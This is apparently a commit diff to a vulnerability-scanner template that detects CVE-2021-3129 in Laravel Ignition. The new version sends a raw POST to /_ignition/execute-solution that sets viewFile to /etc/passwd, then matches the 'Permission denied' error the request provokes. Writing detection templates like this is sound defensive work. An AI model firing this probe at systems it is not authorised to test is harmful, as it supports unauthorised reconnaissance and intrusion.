improved matcher

cves/2021/CVE-2021-3129.yaml

@@ -9,16 +9,19 @@ info:
   tags: cve,cve2021,laravel,rce
 
 requests:
-  - method: GET
-    path:
-      - "{{BaseURL}}/_ignition/execute-solution"
+  - raw:
+      - |
+        POST /_ignition/execute-solution HTTP/1.1
+        Host: {{Hostname}}
+        Accept-Encoding: deflate
+        Accept: application/json
+        Connection: close
+        Content-Length: 144
+        Content-Type: application/json
+
+        {"solution": "Facade\\Ignition\\Solutions\\MakeViewVariableOptionalSolution", "parameters": {"variableName": "test", "viewFile": "/etc/passwd"}}
 
-    matchers-condition: and
     matchers:
-      - type: status
-        status:
-          - 405
       - type: word
         words:
-          - "laravel"
-        negative: true
+          - "failed to open stream: Permission denied"